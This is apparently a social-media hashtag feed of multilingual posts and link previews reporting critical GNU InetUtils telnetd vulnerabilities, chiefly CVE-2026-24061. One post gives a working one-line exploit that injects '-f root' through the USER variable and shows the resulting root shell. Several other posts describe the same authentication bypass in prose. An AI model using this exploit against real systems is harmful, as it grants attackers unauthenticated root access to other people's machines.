13Apr 15
Krytyczna podatność w telnetd https://sekurak.pl/krytyczna-podatnosc-w-telnetd/ #Wbiegu #Linemode #Podatno #Telnet #Telnetd #Vulnerability
Krytyczna podatność w telnetd

Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...

Sekurak
sekurak NewsApr 15

Krytyczna podatność w telnetd

Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...

#WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability

https://sekurak.pl/krytyczna-podatnosc-w-telnetd/

Krytyczna podatność w telnetd

Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...

Sekurak
securityaffairsMar 18
Researchers warn of unpatched, critical #Telnetd flaw affecting all versions
https://securityaffairs.com/189620/hacking/researchers-warn-of-unpatched-critical-telnetd-flaw-affecting-all-versions.html
#securityaffairs #hacking
Researchers warn of unpatched, critical Telnetd flaw affecting all versions

CVE-2026-32746 is a critical flaw in GNU InetUtils telnetd that allows remote attackers to execute code with elevated privileges

Security Affairs
Hackaday [Unofficial]Mar 6

This Week In Security: Getting Back Up to Speed

https://fed.brid.gy/r/https://hackaday.com/2026/03/06/this-week-in-security-getting-back-up-to-speed/

13Mar 6
This Week In Security: Getting Back Up to Speed https://hackaday.com/2026/03/06/this-week-in-security-getting-back-up-to-speed/
#HackadayColumns #SecurityHacks #Artificialintelligence #Glibc #Javascript #Kismet #Notepad #Openssl #Telnet #Telnetd #ThisWeekinSecurity
This Week In Security: Getting Back Up To Speed

Editor’s Note: Over the course of nearly 300 posts, Jonathan Bennett set a very high bar for this column, so we knew it needed to be placed in the hands of somebody who could do it justice. T…

Hackaday
Gea-Suan LinFeb 13

https://blog.gslin.org/archives/2026/02/13/12889/telnetd-%e5%87%ba%e5%8c%85/

Telnetd 出包

#flaw #gnu #inetutils #login #network #root #security #telnet #telnetd #user

Telnetd 出包

在「2026-01-14: The Day the telnet Died (via)」這邊看到的,這篇是講一堆 ISP 擋 port 23 的事情,因為有 backdoor 開始用 telnetd 的漏洞。 這個漏洞有夠哭腰,只要用 -f root 當作 username 就會拿到 root 了,免密碼: CVE-2026-24061 is a critical (CVSS 9.

Gea-Suan Lin's BLOG
Marcel SIneM(S)USJan 30
#Telnet-Sicherheitslücke: Wegen kritischen Risikos patchen | Security https://www.heise.de/news/Kritische-telnetd-Luecke-Patchen-aber-Panik-ist-unbegruendet-11155419.html #Patchday #telnetd #OpenSource
Telnet-Sicherheitslücke: Wegen kritischen Risikos patchen

Eine kritische Sicherheitslücke in telnetd der GNU InetUtils erheischt derzeit Aufmerksamkeit. Admins sollten patchen.

heise online
Show threadMonte FreemanJan 28

https://www.cve.org/CVERecord?id=CVE-2026-24061

#itsecurity #unix #linux #telnet #telnetd

Monte FreemanJan 28

Warning: computer nerd stuff below:

So. In 2026, telnet is still a thing.
Really? 😑

ubuntu@ubuntu:~$ USER=“-f root” telnet -a victim.ip.address

[usual Ubuntu /etc/issue text]

root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)

You’re welcome.

#itsecurity #unix #linux #telnet #telnetd

HabrJan 27

Security Week 2605: тривиальная ошибка в telnetd

20 января разработчик Саймон Йозефссон опубликовал в рассылке oss-sec информацию о крайне серьезной уязвимости в демоне telnetd, реализующем удаленное подключение по протоколу telnet. В традиционной для описания уязвимости терминологии суть проблемы заключается в следующем: «ошибка в обработке входящих данных позволяет злоумышленнику пропустить процесс аутентификации и получить на подверженной уязвимости системе права суперпользователя». Применение таких терминов обычно обозначает, что подлинное описание проблемы либо слишком длинное, либо слишком сложное для понимания, но в данном случае это не так. При подключении к telnetd нужно указать имя пользователя. Его программа передает стандартной утилите login , причем передача осуществляется без предварительной проверки ввода от желающего подключиться. Если указать вместо имени пользователя строку «-f root», эти данные будут переданы в утилиту login, а она уже залогинит любого желающего под рутом без какой-либо авторизации, увидев соответствующий ключ -f. Собственно, это вся уязвимость как есть.

https://habr.com/ru/companies/kaspersky/articles/989152/

#иб #telnetd

Security Week 2605: тривиальная ошибка в telnetd

20 января разработчик Саймон Йозефссон опубликовал в рассылке oss-sec информацию о крайне серьезной уязвимости в демоне telnetd, реализующем удаленное подключение по протоколу telnet. В традиционной...

Хабр